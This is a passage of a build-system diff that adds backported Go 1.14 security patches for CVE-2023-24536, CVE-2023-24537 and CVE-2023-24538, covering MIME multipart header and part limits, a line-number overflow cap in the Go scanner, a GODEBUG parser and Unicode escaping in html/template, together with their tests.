51 // using a consistent per-value cost for overhead is simpler.
52+ const mapEntryOverhead = 200
53 maxMemoryBytes -= int64(len(name))
54- maxMemoryBytes -= 100 // map overhead
55+ maxMemoryBytes -= mapEntryOverhead
56 if maxMemoryBytes < 0 {
57 // We can't actually take this path, since nextPart would already have
58 // rejected the MIME headers for being too large. Check anyway.
59@@ -128,7 +129,10 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
60 }
61
62 // file, store in memory or on disk
63+ const fileHeaderSize = 100
64 maxMemoryBytes -= mimeHeaderSize(p.Header)
65+ maxMemoryBytes -= mapEntryOverhead
66+ maxMemoryBytes -= fileHeaderSize
67 if maxMemoryBytes < 0 {
68 return nil, ErrMessageTooLarge
69 }
70@@ -183,9 +187,10 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
71 }
72
73 func mimeHeaderSize(h textproto.MIMEHeader) (size int64) {
74+ size = 400
75 for k, vs := range h {
76 size += int64(len(k))
77- size += 100 // map entry overhead
78+ size += 200 // map entry overhead
79 for _, v := range vs {
80 size += int64(len(v))
81 }
82diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
83index f5b56083b2377..8ed26e0c34081 100644
84--- a/src/mime/multipart/formdata_test.go
85+++ b/src/mime/multipart/formdata_test.go
86@@ -192,10 +192,10 @@ func (r *failOnReadAfterErrorReader) Read(p []byte) (n int, err error) {
87 // TestReadForm_NonFileMaxMemory asserts that the ReadForm maxMemory limit is applied
88 // while processing non-file form data as well as file form data.
89 func TestReadForm_NonFileMaxMemory(t *testing.T) {
90- n := 10<<20 + 25
91 if testing.Short() {
92- n = 10<<10 + 25
93+ t.Skip("skipping in -short mode")
94 }
95+ n := 10 << 20
96 largeTextValue := strings.Repeat("1", n)
97 message := `--MyBoundary
98 Content-Disposition: form-data; name="largetext"
99@@ -203,38 +203,29 @@ Content-Disposition: form-data; name="largetext"
100 ` + largeTextValue + `
101 --MyBoundary--
102 `
103-
104 testBody := strings.ReplaceAll(message, "\n", "\r\n")
105- testCases := []struct {
106- name string
107- maxMemory int64
108- err error
109- }{
110- {"smaller", 50 + int64(len("largetext")) + 100, nil},
111- {"exact-fit", 25 + int64(len("largetext")) + 100, nil},
112- {"too-large", 0, ErrMessageTooLarge},
113- }
114- for _, tc := range testCases {
115- t.Run(tc.name, func(t *testing.T) {
116- if tc.maxMemory == 0 && testing.Short() {
117- t.Skip("skipping in -short mode")
118- }
119- b := strings.NewReader(testBody)
120- r := NewReader(b, boundary)
121- f, err := r.ReadForm(tc.maxMemory)
122- if err == nil {
123- defer f.RemoveAll()
124- }
125- if tc.err != err {
126- t.Fatalf("ReadForm error - got: %v; expected: %v", err, tc.err)
127- }
128- if err == nil {
129- if g := f.Value["largetext"][0]; g != largeTextValue {
130- t.Errorf("largetext mismatch: got size: %v, expected size: %v", len(g), len(largeTextValue))
131- }
132- }
133- })
134+ // Try parsing the form with increasing maxMemory values.
135+ // Changes in how we account for non-file form data may cause the exact point
136+ // where we change from rejecting the form as too large to accepting it to vary,
137+ // but we should see both successes and failures.
138+ const failWhenMaxMemoryLessThan = 128
139+ for maxMemory := int64(0); maxMemory < failWhenMaxMemoryLessThan*2; maxMemory += 16 {
140+ b := strings.NewReader(testBody)
141+ r := NewReader(b, boundary)
142+ f, err := r.ReadForm(maxMemory)
143+ if err != nil {
144+ continue
145+ }
146+ if g := f.Value["largetext"][0]; g != largeTextValue {
147+ t.Errorf("largetext mismatch: got size: %v, expected size: %v", len(g), len(largeTextValue))
148+ }
149+ f.RemoveAll()
150+ if maxMemory < failWhenMaxMemoryLessThan {
151+ t.Errorf("ReadForm(%v): no error, expect to hit memory limit when maxMemory < %v", maxMemory, failWhenMaxMemoryLessThan)
152+ }
153+ return
154 }
155+ t.Errorf("ReadForm(x) failed for x < 1024, expect success")
156 }
157
158 // TestReadForm_MetadataTooLarge verifies that we account for the size of field names,
159diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
160index 9a21777df8be0..c1284fde25eb7 100644
161--- a/src/net/textproto/reader.go
162+++ b/src/net/textproto/reader.go
163@@ -503,6 +503,12 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
164
165 m := make(MIMEHeader, hint)
166
167+ // Account for 400 bytes of overhead for the MIMEHeader, plus 200 bytes per entry.
168+ // Benchmarking map creation as of go1.20, a one-entry MIMEHeader is 416 bytes and large
169+ // MIMEHeaders average about 200 bytes per entry.
170+ lim -= 400
171+ const mapEntryOverhead = 200
172+
173 // The first line cannot start with a leading space.
174 if buf, err := r.R.Peek(1); err == nil && (buf[0] == ' ' || buf[0] == '\t') {
175 line, err := r.readLineSlice()
176@@ -538,7 +544,7 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
177 vv := m[key]
178 if vv == nil {
179 lim -= int64(len(key))
180- lim -= 100 // map entry overhead
181+ lim -= mapEntryOverhead
182 }
183 lim -= int64(len(value))
184 if lim < 0 {
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch
new file mode 100644
index 0000000000..58c0a484ee
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch
@@ -0,0 +1,349 @@
1From 7917b5f31204528ea72e0629f0b7d52b35b27538 Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Mon, 20 Mar 2023 10:43:19 -0700
4Subject: [PATCH] [release-branch.go1.19] mime/multipart: limit parsed mime message sizes
5
6The parsed forms of MIME headers and multipart forms can consume
7substantially more memory than the size of the input data.
8A malicious input containing a very large number of headers or
9form parts can cause excessively large memory allocations.
10
11Set limits on the size of MIME data:
12
13Reader.NextPart and Reader.NextRawPart limit the the number
14of headers in a part to 10000.
15
16Reader.ReadForm limits the total number of headers in all
17FileHeaders to 10000.
18
19Both of these limits may be set with with
20GODEBUG=multipartmaxheaders=<values>.
21
22Reader.ReadForm limits the number of parts in a form to 1000.
23This limit may be set with GODEBUG=multipartmaxparts=<value>.
24
25Thanks for Jakob Ackermann (@das7pad) for reporting this issue.
26
27For CVE-2023-24536
28For #59153
29For #59269
30
31Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802455
32Run-TryBot: Damien Neil <dneil@google.com>
33Reviewed-by: Roland Shoemaker <bracewell@google.com>
34Reviewed-by: Julie Qiu <julieqiu@google.com>
35Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1801087
36Reviewed-by: Damien Neil <dneil@google.com>
37Run-TryBot: Roland Shoemaker <bracewell@google.com>
38Change-Id: If134890d75f0d95c681d67234daf191ba08e6424
39Reviewed-on: https://go-review.googlesource.com/c/go/+/481985
40Run-TryBot: Michael Knyszek <mknyszek@google.com>
41Auto-Submit: Michael Knyszek <mknyszek@google.com>
42TryBot-Result: Gopher Robot <gobot@golang.org>
43Reviewed-by: Matthew Dempsky <mdempsky@google.com>
44
45Upstream-Status: Backport [https://github.com/golang/go/commit/7917b5f31204528ea72e0629f0b7d52b35b27538]
46CVE: CVE-2023-24536
47Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
48---
49 src/mime/multipart/formdata.go | 19 ++++++++-
50 src/mime/multipart/formdata_test.go | 61 ++++++++++++++++++++++++++++
51 src/mime/multipart/multipart.go | 31 ++++++++++----
52 src/mime/multipart/readmimeheader.go | 2 +-
53 src/net/textproto/reader.go | 19 +++++----
54 5 files changed, 115 insertions(+), 17 deletions(-)
55
56diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
57index 216cccb..0b508ae 100644
58--- a/src/mime/multipart/formdata.go
59+++ b/src/mime/multipart/formdata.go
60@@ -13,6 +13,7 @@ import (
61 "math"
62 "net/textproto"
63 "os"
64+ "strconv"
65 )
66
67 // ErrMessageTooLarge is returned by ReadForm if the message form
68@@ -42,6 +43,15 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
69 numDiskFiles := 0
70 multipartFiles := godebug.Get("multipartfiles")
71 combineFiles := multipartFiles != "distinct"
72+ maxParts := 1000
73+ multipartMaxParts := godebug.Get("multipartmaxparts")
74+ if multipartMaxParts != "" {
75+ if v, err := strconv.Atoi(multipartMaxParts); err == nil && v >= 0 {
76+ maxParts = v
77+ }
78+ }
79+ maxHeaders := maxMIMEHeaders()
80+
81 defer func() {
82 if file != nil {
83 if cerr := file.Close(); err == nil {
84@@ -87,13 +97,17 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
85 }
86 var copyBuf []byte
87 for {
88- p, err := r.nextPart(false, maxMemoryBytes)
89+ p, err := r.nextPart(false, maxMemoryBytes, maxHeaders)
90 if err == io.EOF {
91 break
92 }
93 if err != nil {
94 return nil, err
95 }
96+ if maxParts <= 0 {
97+ return nil, ErrMessageTooLarge
98+ }
99+ maxParts--
100
101 name := p.FormName()
102 if name == "" {
103@@ -137,6 +151,9 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
104 if maxMemoryBytes < 0 {
105 return nil, ErrMessageTooLarge
106 }
107+ for _, v := range p.Header {
108+ maxHeaders -= int64(len(v))
109+ }
110 fh := &FileHeader{
111 Filename: filename,
112 Header: p.Header,
113diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
114index 8ed26e0..c78eeb7 100644
115--- a/src/mime/multipart/formdata_test.go
116+++ b/src/mime/multipart/formdata_test.go
117@@ -360,6 +360,67 @@ func testReadFormManyFiles(t *testing.T, distinct bool) {
118 }
119 }
120
121+func TestReadFormLimits(t *testing.T) {
122+ for _, test := range []struct {
123+ values int
124+ files int
125+ extraKeysPerFile int
126+ wantErr error
127+ godebug string
128+ }{
129+ {values: 1000},
130+ {values: 1001, wantErr: ErrMessageTooLarge},
131+ {values: 500, files: 500},
132+ {values: 501, files: 500, wantErr: ErrMessageTooLarge},
133+ {files: 1000},
134+ {files: 1001, wantErr: ErrMessageTooLarge},
135+ {files: 1, extraKeysPerFile: 9998}, // plus Content-Disposition and Content-Type
136+ {files: 1, extraKeysPerFile: 10000, wantErr: ErrMessageTooLarge},
137+ {godebug: "multipartmaxparts=100", values: 100},
138+ {godebug: "multipartmaxparts=100", values: 101, wantErr: ErrMessageTooLarge},
139+ {godebug: "multipartmaxheaders=100", files: 2, extraKeysPerFile: 48},
140+ {godebug: "multipartmaxheaders=100", files: 2, extraKeysPerFile: 50, wantErr: ErrMessageTooLarge},
141+ } {
142+ name := fmt.Sprintf("values=%v/files=%v/extraKeysPerFile=%v", test.values, test.files, test.extraKeysPerFile)
143+ if test.godebug != "" {
144+ name += fmt.Sprintf("/godebug=%v", test.godebug)
145+ }
146+ t.Run(name, func(t *testing.T) {
147+ if test.godebug != "" {
148+ t.Setenv("GODEBUG", test.godebug)
149+ }
150+ var buf bytes.Buffer
151+ fw := NewWriter(&buf)
152+ for i := 0; i < test.values; i++ {
153+ w, _ := fw.CreateFormField(fmt.Sprintf("field%v", i))
154+ fmt.Fprintf(w, "value %v", i)
155+ }
156+ for i := 0; i < test.files; i++ {
157+ h := make(textproto.MIMEHeader)
158+ h.Set("Content-Disposition",
159+ fmt.Sprintf(`form-data; name="file%v"; filename="file%v"`, i, i))
160+ h.Set("Content-Type", "application/octet-stream")
161+ for j := 0; j < test.extraKeysPerFile; j++ {
162+ h.Set(fmt.Sprintf("k%v", j), "v")
163+ }
164+ w, _ := fw.CreatePart(h)
165+ fmt.Fprintf(w, "value %v", i)
166+ }
167+ if err := fw.Close(); err != nil {
168+ t.Fatal(err)
169+ }
170+ fr := NewReader(bytes.NewReader(buf.Bytes()), fw.Boundary())
171+ form, err := fr.ReadForm(1 << 10)
172+ if err == nil {
173+ defer form.RemoveAll()
174+ }
175+ if err != test.wantErr {
176+ t.Errorf("ReadForm = %v, want %v", err, test.wantErr)
177+ }
178+ })
179+ }
180+}
181+
182 func BenchmarkReadForm(b *testing.B) {
183 for _, test := range []struct {
184 name string
185diff --git a/src/mime/multipart/multipart.go b/src/mime/multipart/multipart.go
186index 958cef8..94464a8 100644
187--- a/src/mime/multipart/multipart.go
188+++ b/src/mime/multipart/multipart.go
189@@ -16,11 +16,13 @@ import (
190 "bufio"
191 "bytes"
192 "fmt"
193+ "internal/godebug"
194 "io"
195 "io/ioutil"
196 "mime"
197 "mime/quotedprintable"
198 "net/textproto"
199+ "strconv"
200 "strings"
201 )
202
203@@ -121,12 +123,12 @@ func (r *stickyErrorReader) Read(p []byte) (n int, _ error) {
204 return n, r.err
205 }
206
207-func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
208+func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize, maxMIMEHeaders int64) (*Part, error) {
209 bp := &Part{
210 Header: make(map[string][]string),
211 mr: mr,
212 }
213- if err := bp.populateHeaders(maxMIMEHeaderSize); err != nil {
214+ if err := bp.populateHeaders(maxMIMEHeaderSize, maxMIMEHeaders); err != nil {
215 return nil, err
216 }
217 bp.r = partReader{bp}
218@@ -142,9 +144,9 @@ func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
219 return bp, nil
220 }
221
222-func (bp *Part) populateHeaders(maxMIMEHeaderSize int64) error {
223+func (bp *Part) populateHeaders(maxMIMEHeaderSize, maxMIMEHeaders int64) error {
224 r := textproto.NewReader(bp.mr.bufReader)
225- header, err := readMIMEHeader(r, maxMIMEHeaderSize)
226+ header, err := readMIMEHeader(r, maxMIMEHeaderSize, maxMIMEHeaders)
227 if err == nil {
228 bp.Header = header
229 }
230@@ -306,6 +308,19 @@ type Reader struct {
231 // including header keys, values, and map overhead.
232 const maxMIMEHeaderSize = 10 << 20
233
234+func maxMIMEHeaders() int64 {
235+ // multipartMaxHeaders is the maximum number of header entries NextPart will return,
236+ // as well as the maximum combined total of header entries Reader.ReadForm will return
237+ // in FileHeaders.
238+ multipartMaxHeaders := godebug.Get("multipartmaxheaders")
239+ if multipartMaxHeaders != "" {
240+ if v, err := strconv.ParseInt(multipartMaxHeaders, 10, 64); err == nil && v >= 0 {
241+ return v
242+ }
243+ }
244+ return 10000
245+}
246+
247 // NextPart returns the next part in the multipart or an error.
248 // When there are no more parts, the error io.EOF is returned.
249 //
250@@ -313,7 +328,7 @@ const maxMIMEHeaderSize = 10 << 20
251 // has a value of "quoted-printable", that header is instead
252 // hidden and the body is transparently decoded during Read calls.
253 func (r *Reader) NextPart() (*Part, error) {
254- return r.nextPart(false, maxMIMEHeaderSize)
255+ return r.nextPart(false, maxMIMEHeaderSize, maxMIMEHeaders())
256 }
257
258 // NextRawPart returns the next part in the multipart or an error.
259@@ -322,10 +337,10 @@ func (r *Reader) NextPart() (*Part, error) {
260 // Unlike NextPart, it does not have special handling for
261 // "Content-Transfer-Encoding: quoted-printable".
262 func (r *Reader) NextRawPart() (*Part, error) {
263- return r.nextPart(true, maxMIMEHeaderSize)
264+ return r.nextPart(true, maxMIMEHeaderSize, maxMIMEHeaders())
265 }
266
267-func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
268+func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize, maxMIMEHeaders int64) (*Part, error) {
269 if r.currentPart != nil {
270 r.currentPart.Close()
271 }
272@@ -350,7 +365,7 @@ func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize int64) (*Part, error)
273
274 if r.isBoundaryDelimiterLine(line) {
275 r.partsRead++
276- bp, err := newPart(r, rawPart, maxMIMEHeaderSize)
277+ bp, err := newPart(r, rawPart, maxMIMEHeaderSize, maxMIMEHeaders)
278 if err != nil {
279 return nil, err
280 }
281diff --git a/src/mime/multipart/readmimeheader.go b/src/mime/multipart/readmimeheader.go
282index 6836928..25aa6e2 100644
283--- a/src/mime/multipart/readmimeheader.go
284+++ b/src/mime/multipart/readmimeheader.go
285@@ -11,4 +11,4 @@ import (
286 // readMIMEHeader is defined in package net/textproto.
287 //
288 //go:linkname readMIMEHeader net/textproto.readMIMEHeader
289-func readMIMEHeader(r *textproto.Reader, lim int64) (textproto.MIMEHeader, error)
290+func readMIMEHeader(r *textproto.Reader, maxMemory, maxHeaders int64) (textproto.MIMEHeader, error)
291diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
292index 1c79f0a..ad2d777 100644
293--- a/src/net/textproto/reader.go
294+++ b/src/net/textproto/reader.go
295@@ -484,12 +484,12 @@ func (r *Reader) ReadDotLines() ([]string, error) {
296 // }
297 //
298 func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
299- return readMIMEHeader(r, math.MaxInt64)
300+ return readMIMEHeader(r, math.MaxInt64, math.MaxInt64)
301 }
302
303 // readMIMEHeader is a version of ReadMIMEHeader which takes a limit on the header size.
304 // It is called by the mime/multipart package.
305-func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
306+func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error) {
307 // Avoid lots of small slice allocations later by allocating one
308 // large one ahead of time which we'll cut up into smaller
309 // slices. If this isn't big enough later, we allocate small ones.
310@@ -507,7 +507,7 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
311 // Account for 400 bytes of overhead for the MIMEHeader, plus 200 bytes per entry.
312 // Benchmarking map creation as of go1.20, a one-entry MIMEHeader is 416 bytes and large
313 // MIMEHeaders average about 200 bytes per entry.
314- lim -= 400
315+ maxMemory -= 400
316 const mapEntryOverhead = 200
317
318 // The first line cannot start with a leading space.
319@@ -539,6 +539,11 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
320 continue
321 }
322
323+ maxHeaders--
324+ if maxHeaders < 0 {
325+ return nil, errors.New("message too large")
326+ }
327+
328 // backport 5c55ac9bf1e5f779220294c843526536605f42ab
329 //
330 // value is computed as
331@@ -557,11 +562,11 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
332
333 vv := m[key]
334 if vv == nil {
335- lim -= int64(len(key))
336- lim -= mapEntryOverhead
337+ maxMemory -= int64(len(key))
338+ maxMemory -= mapEntryOverhead
339 }
340- lim -= int64(len(value))
341- if lim < 0 {
342+ maxMemory -= int64(len(value))
343+ if maxMemory < 0 {
344 // TODO: This should be a distinguishable error (ErrMessageTooLarge)
345 // to allow mime/multipart to detect it.
346 return m, errors.New("message too large")
347--
3482.25.1
349
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch
new file mode 100644
index 0000000000..e04b717fc1
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch
@@ -0,0 +1,76 @@
1From bf8c7c575c8a552d9d79deb29e80854dc88528d0 Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Mon, 20 Mar 2023 10:43:19 -0700
4Subject: [PATCH] [release-branch.go1.20] mime/multipart: limit parsed mime
5 message sizes
6
7Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802456
8Reviewed-by: Julie Qiu <julieqiu@google.com>
9Reviewed-by: Roland Shoemaker <bracewell@google.com>
10Run-TryBot: Damien Neil <dneil@google.com>
11Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802611
12Reviewed-by: Damien Neil <dneil@google.com>
13Change-Id: Ifdfa192d54f722d781a4d8c5f35b5fb72d122168
14Reviewed-on: https://go-review.googlesource.com/c/go/+/481986
15Reviewed-by: Matthew Dempsky <mdempsky@google.com>
16TryBot-Result: Gopher Robot <gobot@golang.org>
17Run-TryBot: Michael Knyszek <mknyszek@google.com>
18Auto-Submit: Michael Knyszek <mknyszek@google.com>
19
20Upstream-Status: Backport [https://github.com/golang/go/commit/126a1d02da82f93ede7ce0bd8d3c51ef627f2104]
21CVE: CVE-2023-24537
22Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
23---
24 src/go/parser/parser_test.go | 16 ++++++++++++++++
25 src/go/scanner/scanner.go | 5 ++++-
26 2 files changed, 20 insertions(+), 1 deletion(-)
27
28diff --git a/src/go/parser/parser_test.go b/src/go/parser/parser_test.go
29index 37a6a2b..714557c 100644
30--- a/src/go/parser/parser_test.go
31+++ b/src/go/parser/parser_test.go
32@@ -738,3 +738,19 @@ func TestScopeDepthLimit(t *testing.T) {
33 }
34 }
35 }
36+
37+// TestIssue59180 tests that line number overflow doesn't cause an infinite loop.
38+func TestIssue59180(t *testing.T) {
39+ testcases := []string{
40+ "package p\n//line :9223372036854775806\n\n//",
41+ "package p\n//line :1:9223372036854775806\n\n//",
42+ "package p\n//line file:9223372036854775806\n\n//",
43+ }
44+
45+ for _, src := range testcases {
46+ _, err := ParseFile(token.NewFileSet(), "", src, ParseComments)
47+ if err == nil {
48+ t.Errorf("ParseFile(%s) succeeded unexpectedly", src)
49+ }
50+ }
51+}
52diff --git a/src/go/scanner/scanner.go b/src/go/scanner/scanner.go
53index 00fe2dc..3159d25 100644
54--- a/src/go/scanner/scanner.go
55+++ b/src/go/scanner/scanner.go
56@@ -246,13 +246,16 @@ func (s *Scanner) updateLineInfo(next, offs int, text []byte) {
57 return
58 }
59
60+ // Put a cap on the maximum size of line and column numbers.
61+ // 30 bits allows for some additional space before wrapping an int32.
62+ const maxLineCol = 1<<30 - 1
63 var line, col int
64 i2, n2, ok2 := trailingDigits(text[:i-1])
65 if ok2 {
66 //line filename:line:col
67 i, i2 = i2, i
68 line, col = n2, n
69- if col == 0 {
70+ if col == 0 || col > maxLineCol {
71 s.error(offs+i2, "invalid column number: "+string(text[i2:]))
72 return
73 }
74--
752.25.1
76
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch
new file mode 100644
index 0000000000..23c5075e41
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch
@@ -0,0 +1,125 @@
1From 8acd01094d9ee17f6e763a61e49a8a808b3a9ddb Mon Sep 17 00:00:00 2001
2From: Brad Fitzpatrick <bradfitz@golang.org>
3Date: Mon, 2 Aug 2021 14:55:51 -0700
4Subject: [PATCH 1/6] net/netip: add new IP address package
5
6Co-authored-by: Alex Willmer <alex@moreati.org.uk> (GitHub @moreati)
7Co-authored-by: Alexander Yastrebov <yastrebov.alex@gmail.com>
8Co-authored-by: David Anderson <dave@natulte.net> (Tailscale CLA)
9Co-authored-by: David Crawshaw <crawshaw@tailscale.com> (Tailscale CLA)
10Co-authored-by: Dmytro Shynkevych <dmytro@tailscale.com> (Tailscale CLA)
11Co-authored-by: Elias Naur <mail@eliasnaur.com>
12Co-authored-by: Joe Tsai <joetsai@digital-static.net> (Tailscale CLA)
13Co-authored-by: Jonathan Yu <jawnsy@cpan.org> (GitHub @jawnsy)
14Co-authored-by: Josh Bleecher Snyder <josharian@gmail.com> (Tailscale CLA)
15Co-authored-by: Maisem Ali <maisem@tailscale.com> (Tailscale CLA)
16Co-authored-by: Manuel Mendez (Go AUTHORS mmendez534@...)
17Co-authored-by: Matt Layher <mdlayher@gmail.com>
18Co-authored-by: Noah Treuhaft <noah.treuhaft@gmail.com> (GitHub @nwt)
19Co-authored-by: Stefan Majer <stefan.majer@gmail.com>
20Co-authored-by: Terin Stock <terinjokes@gmail.com> (Cloudflare CLA)
21Co-authored-by: Tobias Klauser <tklauser@distanz.ch>
22
23Fixes #46518
24
25Change-Id: I0041f9e1115d61fa6e95fcf32b01d9faee708712
26Reviewed-on: https://go-review.googlesource.com/c/go/+/339309
27Run-TryBot: Brad Fitzpatrick <bradfitz@golang.org>
28TryBot-Result: Go Bot <gobot@golang.org>
29Reviewed-by: Russ Cox <rsc@golang.org>
30Trust: Brad Fitzpatrick <bradfitz@golang.org>
31
32Dependency Patch #1
33
34Upstream-Status: Backport from https://github.com/golang/go/commit/a59e33224e42d60a97fa720a45e1b74eb6aaa3d0
35CVE: CVE-2023-24538
36Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
37---
38 src/internal/godebug/godebug.go | 34 ++++++++++++++++++++++++++++++++++
39 src/internal/godebug/godebug_test.go | 34 ++++++++++++++++++++++++++++++++++
40 2 files changed, 68 insertions(+)
41 create mode 100644 src/internal/godebug/godebug.go
42 create mode 100644 src/internal/godebug/godebug_test.go
43
44diff --git a/src/internal/godebug/godebug.go b/src/internal/godebug/godebug.go
45new file mode 100644
46index 0000000..ac434e5
47--- /dev/null
48+++ b/src/internal/godebug/godebug.go
49@@ -0,0 +1,34 @@
50+// Copyright 2021 The Go Authors. All rights reserved.
51+// Use of this source code is governed by a BSD-style
52+// license that can be found in the LICENSE file.
53+
54+// Package godebug parses the GODEBUG environment variable.
55+package godebug
56+
57+import "os"
58+
59+// Get returns the value for the provided GODEBUG key.
60+func Get(key string) string {
61+ return get(os.Getenv("GODEBUG"), key)
62+}
63+
64+// get returns the value part of key=value in s (a GODEBUG value).
65+func get(s, key string) string {
66+ for i := 0; i < len(s)-len(key)-1; i++ {
67+ if i > 0 && s[i-1] != ',' {
68+ continue
69+ }
70+ afterKey := s[i+len(key):]
71+ if afterKey[0] != '=' || s[i:i+len(key)] != key {
72+ continue
73+ }
74+ val := afterKey[1:]
75+ for i, b := range val {
76+ if b == ',' {
77+ return val[:i]
78+ }
79+ }
80+ return val
81+ }
82+ return ""
83+}
84diff --git a/src/internal/godebug/godebug_test.go b/src/internal/godebug/godebug_test.go
85new file mode 100644
86index 0000000..41b9117
87--- /dev/null
88+++ b/src/internal/godebug/godebug_test.go
89@@ -0,0 +1,34 @@
90+// Copyright 2021 The Go Authors. All rights reserved.
91+// Use of this source code is governed by a BSD-style
92+// license that can be found in the LICENSE file.
93+
94+package godebug
95+
96+import "testing"
97+
98+func TestGet(t *testing.T) {
99+ tests := []struct {
100+ godebug string
101+ key string
102+ want string
103+ }{
104+ {"", "", ""},
105+ {"", "foo", ""},
106+ {"foo=bar", "foo", "bar"},
107+ {"foo=bar,after=x", "foo", "bar"},
108+ {"before=x,foo=bar,after=x", "foo", "bar"},
109+ {"before=x,foo=bar", "foo", "bar"},
110+ {",,,foo=bar,,,", "foo", "bar"},
111+ {"foodecoy=wrong,foo=bar", "foo", "bar"},
112+ {"foo=", "foo", ""},
113+ {"foo", "foo", ""},
114+ {",foo", "foo", ""},
115+ {"foo=bar,baz", "loooooooong", ""},
116+ }
117+ for _, tt := range tests {
118+ got := get(tt.godebug, tt.key)
119+ if got != tt.want {
120+ t.Errorf("get(%q, %q) = %q; want %q", tt.godebug, tt.key, got, tt.want)
121+ }
122+ }
123+}
124--
1252.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-2.patch
new file mode 100644
index 0000000000..f200c41e16
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-2.patch
@@ -0,0 +1,635 @@
1From 6fc21505614f36178df0dad7034b6b8e3f7588d5 Mon Sep 17 00:00:00 2001
2From: empijei <robclap8@gmail.com>
3Date: Fri, 27 Mar 2020 19:27:55 +0100
4Subject: [PATCH 2/6] html/template,text/template: switch to Unicode escapes
5 for JSON compatibility
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10The existing implementation is not compatible with JSON
11escape as it uses hex escaping.
12Unicode escape, instead, is valid for both JSON and JS.
13This fix avoids creating a separate escaping context for
14scripts of type "application/ld+json" and it is more
15future-proof in case more JSON+JS contexts get added
16to the platform (e.g. import maps).
17
18Fixes #33671
19Fixes #37634
20
21Change-Id: Id6f6524b4abc52e81d9d744d46bbe5bf2e081543
22Reviewed-on: https://go-review.googlesource.com/c/go/+/226097
23Reviewed-by: Carl Johnson <me@carlmjohnson.net>
24Reviewed-by: Daniel Martí <mvdan@mvdan.cc>
25Run-TryBot: Daniel Martí <mvdan@mvdan.cc>
26TryBot-Result: Gobot Gobot <gobot@golang.org>
27
28Dependency Patch #2
29
30Upstream-Status: Backport from https://github.com/golang/go/commit/d4d298040d072ddacea0e0d6b55fb148fff18070
31CVE: CVE-2023-24538
32Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
33---
34 src/html/template/content_test.go | 70 +++++++++++++++++++-------------------
35 src/html/template/escape_test.go | 6 ++--
36 src/html/template/example_test.go | 6 ++--
37 src/html/template/js.go | 70 +++++++++++++++++++++++---------------
38 src/html/template/js_test.go | 68 ++++++++++++++++++------------------
39 src/html/template/template_test.go | 39 +++++++++++++++++++++
40 src/text/template/exec_test.go | 6 ++--
41 src/text/template/funcs.go | 8 ++---
42 8 files changed, 163 insertions(+), 110 deletions(-)
43
44diff --git a/src/html/template/content_test.go b/src/html/template/content_test.go
45index 72d56f5..bd86527 100644
46--- a/src/html/template/content_test.go
47+++ b/src/html/template/content_test.go
48@@ -18,7 +18,7 @@ func TestTypedContent(t *testing.T) {
49 HTML(`Hello, <b>World</b> &amp;tc!`),
50 HTMLAttr(` dir="ltr"`),
51 JS(`c && alert("Hello, World!");`),
52- JSStr(`Hello, World & O'Reilly\x21`),
53+ JSStr(`Hello, World & O'Reilly\u0021`),
54 URL(`greeting=H%69,&addressee=(World)`),
55 Srcset(`greeting=H%69,&addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`),
56 URL(`,foo/,`),
57@@ -70,7 +70,7 @@ func TestTypedContent(t *testing.T) {
58 `Hello, <b>World</b> &amp;tc!`,
59 ` dir=&#34;ltr&#34;`,
60 `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
61- `Hello, World &amp; O&#39;Reilly\x21`,
62+ `Hello, World &amp; O&#39;Reilly\u0021`,
